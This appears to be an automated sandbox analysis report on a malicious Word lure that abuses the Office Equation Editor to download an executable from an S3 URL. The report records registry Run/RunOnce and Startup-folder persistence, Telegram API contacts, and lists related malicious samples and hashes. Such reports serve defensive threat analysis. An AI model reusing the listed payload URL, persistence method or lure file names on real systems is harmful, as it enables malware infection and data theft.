HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Report creation exceeded maximum time and may have missing behavior and disassembly information. TCP Packets have been reduced to 100 Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:17:34	API Interceptor	138x Sleep call for process: EQNEDT32.EXE modified
20:17:39	API Interceptor	1110x Sleep call for process: CTF loader_es.exe modified
20:17:46	API Interceptor	274x Sleep call for process: powershell.exe modified
20:17:48	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
20:17:52	API Interceptor	246x Sleep call for process: Bw6d8Paf6bOV36xS4N6.exe modified
20:18:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6 C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
20:18:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6 C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
20:18:11	API Interceptor	8x Sleep call for process: svchost.exe modified
20:18:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe
20:18:41	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
149.154.167.220	Pending DHL Shipment Notification REF 04521.xlsx	Get hash	malicious	Browse
	04052021paymentscancopy.doc	Get hash	malicious	Browse
	85a3f6aa_by_Libranalysis.rtf	Get hash	malicious	Browse
	BID6200306761.exe	Get hash	malicious	Browse
	OverdueInvoice-PDF.exe	Get hash	malicious	Browse
	SLIP.exe	Get hash	malicious	Browse
	NeworderMay20212021-pdf.exe	Get hash	malicious	Browse
	1hbYGZf6BQ.exe	Get hash	malicious	Browse
	from-iso_RFQ___PU.EXE1__.exe	Get hash	malicious	Browse
	Xerox Scan_07122020181109.exe	Get hash	malicious	Browse
	menXxRXr64.exe	Get hash	malicious	Browse
	pN0fSLX8vx.exe	Get hash	malicious	Browse
	Order Of Items Listed.xlsx	Get hash	malicious	Browse
	l6qQa2fQ97.exe	Get hash	malicious	Browse
	PO 300174.xlsx	Get hash	malicious	Browse
	Quotation.exe	Get hash	malicious	Browse
	WdWqhSMRsdKJxkl.exe	Get hash	malicious	Browse
	Quotation 90809.exe	Get hash	malicious	Browse
	nrEs3n7XCQ.exe	Get hash	malicious	Browse
	triage_dropped_file.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
s3-us-west-2-r-w.amazonaws.com	04052021paymentscancopy.doc	Get hash	malicious	Browse	52.218.224.193
	d2c23008_by_Libranalysis.xlsx	Get hash	malicious	Browse	52.218.180.209
	xSf	Get hash	malicious	Browse	52.218.240.169
	https://cornpany.s3-us-west-2.amazonaws.com/kzrtl.html	Get hash	malicious	Browse	52.218.252.49
	https://share-my-resume.s3-us-west-2.amazonaws.com/2020/Emir-Markham-Resume-2020-11-16.doc	Get hash	malicious	Browse	52.218.152.113
	http://bcx-production-attachments-us-west-2.s3-us-west-2.amazonaws.com	Get hash	malicious	Browse	52.218.233.113
	https://docs.google.com/document/d/e/2PACX-1vQxWTOwb4Q2IRxBsWs4I-tazKn6L7Tlb_umbjgm-Hc4VjUaQL96-AhMAkd3g6-XzhGxdl8RYebE29rp/pub	Get hash	malicious	Browse	52.218.237.153
	https://docs.google.com/document/d/e/2PACX-1vS6NK2IbibcQuT3uZBBdNEmndunv9Oiw0jTUmBO6uKBjix7DH6ZwB0EWgfTu2CvIIHlPw9P7lmFSzeT/pub	Get hash	malicious	Browse	52.218.205.17
	5476gsmtf9b8f15e4201.exe	Get hash	malicious	Browse	52.218.244.145
	https://carletoalawyer.com/jss/	Get hash	malicious	Browse	52.218.234.105
	http://coreit.in/?a&login=fakeuser@devnull.com	Get hash	malicious	Browse	52.218.128.29
	PaymentPlan.docx	Get hash	malicious	Browse	52.218.249.65
api.telegram.org	Pending DHL Shipment Notification REF 04521.xlsx	Get hash	malicious	Browse	149.154.167.220
	04052021paymentscancopy.doc	Get hash	malicious	Browse	149.154.167.220
	85a3f6aa_by_Libranalysis.rtf	Get hash	malicious	Browse	149.154.167.220
	BID6200306761.exe	Get hash	malicious	Browse	149.154.167.220
	OverdueInvoice-PDF.exe	Get hash	malicious	Browse	149.154.167.220
	SLIP.exe	Get hash	malicious	Browse	149.154.167.220
	NeworderMay20212021-pdf.exe	Get hash	malicious	Browse	149.154.167.220
	1hbYGZf6BQ.exe	Get hash	malicious	Browse	149.154.167.220
	from-iso_RFQ___PU.EXE1__.exe	Get hash	malicious	Browse	149.154.167.220
	Xerox Scan_07122020181109.exe	Get hash	malicious	Browse	149.154.167.220
	menXxRXr64.exe	Get hash	malicious	Browse	149.154.167.220
	pN0fSLX8vx.exe	Get hash	malicious	Browse	149.154.167.220
	Order Of Items Listed.xlsx	Get hash	malicious	Browse	149.154.167.220
	l6qQa2fQ97.exe	Get hash	malicious	Browse	149.154.167.220
	PO 300174.xlsx	Get hash	malicious	Browse	149.154.167.220
	Quotation.exe	Get hash	malicious	Browse	149.154.167.220
	WdWqhSMRsdKJxkl.exe	Get hash	malicious	Browse	149.154.167.220
	Quotation 90809.exe	Get hash	malicious	Browse	149.154.167.220
	nrEs3n7XCQ.exe	Get hash	malicious	Browse	149.154.167.220
	triage_dropped_file.exe	Get hash	malicious	Browse	149.154.167.220

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	pasteBorder.dll	Get hash	malicious	Browse	13.224.187.73
	04052021paymentscancopy.doc	Get hash	malicious	Browse	52.218.224.193
	Indeed_Update_File.html	Get hash	malicious	Browse	143.204.98.87
	presentation.jar	Get hash	malicious	Browse	15.237.76.117
	presentation.jar	Get hash	malicious	Browse	143.204.98.25
	Tmw6ajHw6W.exe	Get hash	malicious	Browse	3.14.182.203
	New Financial Reports & Statements.html	Get hash	malicious	Browse	52.218.137.48
	609110f2d14a6.dll	Get hash	malicious	Browse	54.154.149.76
	945AEE9E799851EB1A2215FE1A60E55E41EB6D69EF4CB.exe	Get hash	malicious	Browse	3.14.18.91
	SWIFT 00395_IMG.exe	Get hash	malicious	Browse	3.34.109.201
	jH70i5mxJO.exe	Get hash	malicious	Browse	54.188.107.146
	3ZtdRsbjxo.exe	Get hash	malicious	Browse	104.192.141.1
	Documents_111651917_375818984.xls	Get hash	malicious	Browse	18.222.240.99
	4GGwmv0AJm.exe	Get hash	malicious	Browse	52.32.122.68
	c647b2da_by_Libranalysis.exe	Get hash	malicious	Browse	54.72.3.133
	#U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm	Get hash	malicious	Browse	143.204.98.42
	Documents_95326461_1831689059.xls	Get hash	malicious	Browse	3.134.106.170
	0d69e4f6_by_Libranalysis.xls	Get hash	malicious	Browse	99.83.154.118
	d630fc19_by_Libranalysis.xlsx	Get hash	malicious	Browse	52.219.40.51
	presupuesto.xlsx	Get hash	malicious	Browse	143.204.202.49
TELEGRAMRU	Pending DHL Shipment Notification REF 04521.xlsx	Get hash	malicious	Browse	149.154.167.220
	04052021paymentscancopy.doc	Get hash	malicious	Browse	149.154.167.220
	85a3f6aa_by_Libranalysis.rtf	Get hash	malicious	Browse	149.154.167.220
	TT1eJMw4qZ.exe	Get hash	malicious	Browse	95.161.76.100
	BID6200306761.exe	Get hash	malicious	Browse	149.154.167.220
	OverdueInvoice-PDF.exe	Get hash	malicious	Browse	149.154.167.220
	SLIP.exe	Get hash	malicious	Browse	149.154.167.220
	NeworderMay20212021-pdf.exe	Get hash	malicious	Browse	149.154.167.220
	1hbYGZf6BQ.exe	Get hash	malicious	Browse	149.154.167.220
	from-iso_RFQ___PU.EXE1__.exe	Get hash	malicious	Browse	149.154.167.220
	Xerox Scan_07122020181109.exe	Get hash	malicious	Browse	149.154.167.220
	menXxRXr64.exe	Get hash	malicious	Browse	149.154.167.220
	pN0fSLX8vx.exe	Get hash	malicious	Browse	149.154.167.220
	Order Of Items Listed.xlsx	Get hash	malicious	Browse	149.154.167.220
	l6qQa2fQ97.exe	Get hash	malicious	Browse	149.154.167.220
	PO 300174.xlsx	Get hash	malicious	Browse	149.154.167.220
	Quotation.exe	Get hash	malicious	Browse	149.154.167.220
	WdWqhSMRsdKJxkl.exe	Get hash	malicious	Browse	149.154.167.220
	Quotation 90809.exe	Get hash	malicious	Browse	149.154.167.220
	nrEs3n7XCQ.exe	Get hash	malicious	Browse	149.154.167.220

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
36f7277af969a6947a61ae0b815907a1	Pending DHL Shipment Notification REF 04521.xlsx	Get hash	malicious	Browse	149.154.167.220
	04052021paymentscancopy.doc	Get hash	malicious	Browse	149.154.167.220
	85a3f6aa_by_Libranalysis.rtf	Get hash	malicious	Browse	149.154.167.220
	Order Of Items Listed.xlsx	Get hash	malicious	Browse	149.154.167.220
	SWIFT COPY.docx	Get hash	malicious	Browse	149.154.167.220
	PO 300174.xlsx	Get hash	malicious	Browse	149.154.167.220
	INV2104_01.docx	Get hash	malicious	Browse	149.154.167.220
	2af49a1a_by_Libranalysis.docx	Get hash	malicious	Browse	149.154.167.220
	RFQ - 0421.docx	Get hash	malicious	Browse	149.154.167.220
	DHL Shipment Delivery Notification.xlsx	Get hash	malicious	Browse	149.154.167.220
	PO 876450.xlsx	Get hash	malicious	Browse	149.154.167.220
	e2e95366_by_Libranalysis.docx	Get hash	malicious	Browse	149.154.167.220
	Evaluation quoter.docx	Get hash	malicious	Browse	149.154.167.220
	NEW ORDER.xlsx	Get hash	malicious	Browse	149.154.167.220
	Shipping documents.xlsx	Get hash	malicious	Browse	149.154.167.220
	TT PAYMENT ADVISE.xlsx	Get hash	malicious	Browse	149.154.167.220
	PI201.xlsx	Get hash	malicious	Browse	149.154.167.220
	Updated April SOA.xlsx	Get hash	malicious	Browse	149.154.167.220
	MT-808-00021952.xlsx	Get hash	malicious	Browse	149.154.167.220
	NOA_-_CMACGM_-_Booking_Confirmation_0GM3AE1MA_4080215257433000.xlsx	Get hash	malicious	Browse	149.154.167.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\CTF loader_es.exe	lsqtIv1jRK.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\CTF loader_es.exe	04052021paymentscancopy.doc	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe	lsqtIv1jRK.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe	04052021paymentscancopy.doc	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe	lsqtIv1jRK.exe	Get hash	malicious	Browse
	04052021paymentscancopy.doc	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	lsqtIv1jRK.exe	Get hash	malicious	Browse
	04052021paymentscancopy.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	3367424
Entropy (8bit):	2.545995908897728
Encrypted:	false
SSDEEP:	6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
MD5:	D96F52FC8733D2F4A127BDC44D4CEB25
SHA1:	E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
SHA-256:	FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
SHA-512:	08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 19%, Browse Antivirus: ReversingLabs, Detection: 45%
Joe Sandbox View:	Filename: lsqtIv1jRK.exe, Detection: malicious, Browse Filename: 04052021paymentscancopy.doc, Detection: malicious, Browse
IE Cache URL:	http://miolouno.s3-us-west-2.amazonaws.com/mad.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................".(.....^..}.....(.......(.....&.(......".......".(#....Vs....($...t.............0................s......o......0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5DAEF2E-EB6B-4CC4-8C38-663EBE143117}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B9C27487-05CF-4B4D-9086-2A6225ABAACB}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.7625376567837112
Encrypted:	false
SSDEEP:	12:yNFgmmf6KYGc6E5YS+v3S5SVk5uFJGDXbuvq2ZA:ySIGKYtvg50ozbunA
MD5:	074204DD22EFC3A69FE55BC781403EC3
SHA1:	72707AEBA024CED11EA3D6E776A52C8FA45ADB04
SHA-256:	559E001F63D7DD3EB66C66CE6B1A51A7414350D3813CA712BC243EB09B988892
SHA-512:	5A66FF9330AB63A13DF6F44D3D16285812AF4E0CE5BA26C049E8178830E2945AB7407CE0459B3EBDF15E59E393E636C1A0026FC1D34865036F959E02EA602196
Malicious:	false
Preview:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.2.5.9.6.5. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7.0.t.Y.l.y.Y.E.6.8.i.v.h.g.V.e.W.M.5.A.P.f.g.7.T.v.m.Q.3.x.X.s.m.k.V.7.p.X.c.h.a.z.L._.i.x.b.V.P.M.D.T.L.F.f.w.n.c.c.D.s.y.3.e.Y.A.z.X.3.O.O.F.N.S.S.Y.8.H.y.P.g.e.5.g.N.I.C.O.C.5.G.7.Z.b.7.Z.P.q.J.T.V.J.w.o. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.7.6.7.4.5.0.1.7.2.7.6.7.4.5.0.1.7.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D...........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe Download File
Process:	C:\Users\user\AppData\Roaming\CTF loader_es.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	2.545995908897728
Encrypted:	false
SSDEEP:	6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
MD5:	D96F52FC8733D2F4A127BDC44D4CEB25
SHA1:	E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
SHA-256:	FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
SHA-512:	08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 19%, Browse Antivirus: ReversingLabs, Detection: 45%
Joe Sandbox View:	Filename: lsqtIv1jRK.exe, Detection: malicious, Browse Filename: 04052021paymentscancopy.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................".(.....^..}.....(.......(.....&.(......".......".(#....Vs....($...t.............0................s......o......0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.

C:\Users\user\AppData\Roaming\CTF loader_es.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	2.545995908897728
Encrypted:	false
SSDEEP:	6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
MD5:	D96F52FC8733D2F4A127BDC44D4CEB25
SHA1:	E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
SHA-256:	FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
SHA-512:	08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 19%, Browse Antivirus: ReversingLabs, Detection: 45%
Joe Sandbox View:	Filename: lsqtIv1jRK.exe, Detection: malicious, Browse Filename: 04052021paymentscancopy.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................".(.....^..}.....(.......(.....&.(......".......".(#....Vs....($...t.............0................s......o......0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO5421-allignright.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed May 5 02:17:32 2021, length=1259855, window=hide
Category:	dropped
Size (bytes):	2108
Entropy (8bit):	4.553793779364862
Encrypted:	false
SSDEEP:	48:89h/XT3IFPjR3j3pRNQh29h/XT3IFPjR3j3pRNQ/:87/XLIFPjhpRNQh27/XLIFPjhpRNQ/
MD5:	8293B4459C9F6968D0E0E7454F740F36
SHA1:	B74ECEFBAC694C5FBBBCD5F47BA393D13B30C9C4
SHA-256:	E52E92BF7C48BC294369F8A2ACAECCD99AD238FAB3814EB07A6FF61617665FFE
SHA-512:	979B4AC1439B935DE275C20E9C97B1D3BE03FB104452C82913ADE0E7657F715D00184BC50F46F4848515E80361C5F4E394833A3684157D50F7C865FA3E8CA647
Malicious:	false
Preview:	L..................F.... ...].s..{..].s..{....G0]A..O9...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2.O9...R1. .PO5421~1.DOC..Z.......Q.y.Q.y...8.....................P.O.5.4.2.1.-.a.l.l.i.g.n.r.i.g.h.t...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\536720\Users.user\Desktop\PO5421-allignright.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.5.4.2.1.-.a.l.l.i.g.n.r.i.g.h.t...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......536720..........D_....3N...W..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.726425206048351
Encrypted:	false
SSDEEP:	3:M1g1sCjDkYCtMsCjDkYCmX1g1sCjDkYCv:Mi1sCjDk/MsCjDk11sCjDk1
MD5:	E45FF532E008AE827C97A1F42AB3CB4C
SHA1:	30933E62E66F2C6809D43FB23D948A4AA3964ABE
SHA-256:	75D31A400CF9F489EAA4DC94930B81BBC1E9532D803434159882273A76D3E307
SHA-512:	338E79126BB8C469FC681B64F3592AF885DB14A6BFD5B3916C730D196545A446187D732B71AAA0965C85B1DEFDC36D3C6B8B9DCAE8AB56A6698CE75D57D57063
Malicious:	false
Preview:	[doc]..PO5421-allignright.LNK=0..PO5421-allignright.LNK=0..[doc]..PO5421-allignright.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0LDX7R2JK4DBJ4ACQ0LY.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8DDR9KJPJ69FOA7LJA5B.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ADDOQTRWBWXYPRSCERDW.temp Download File
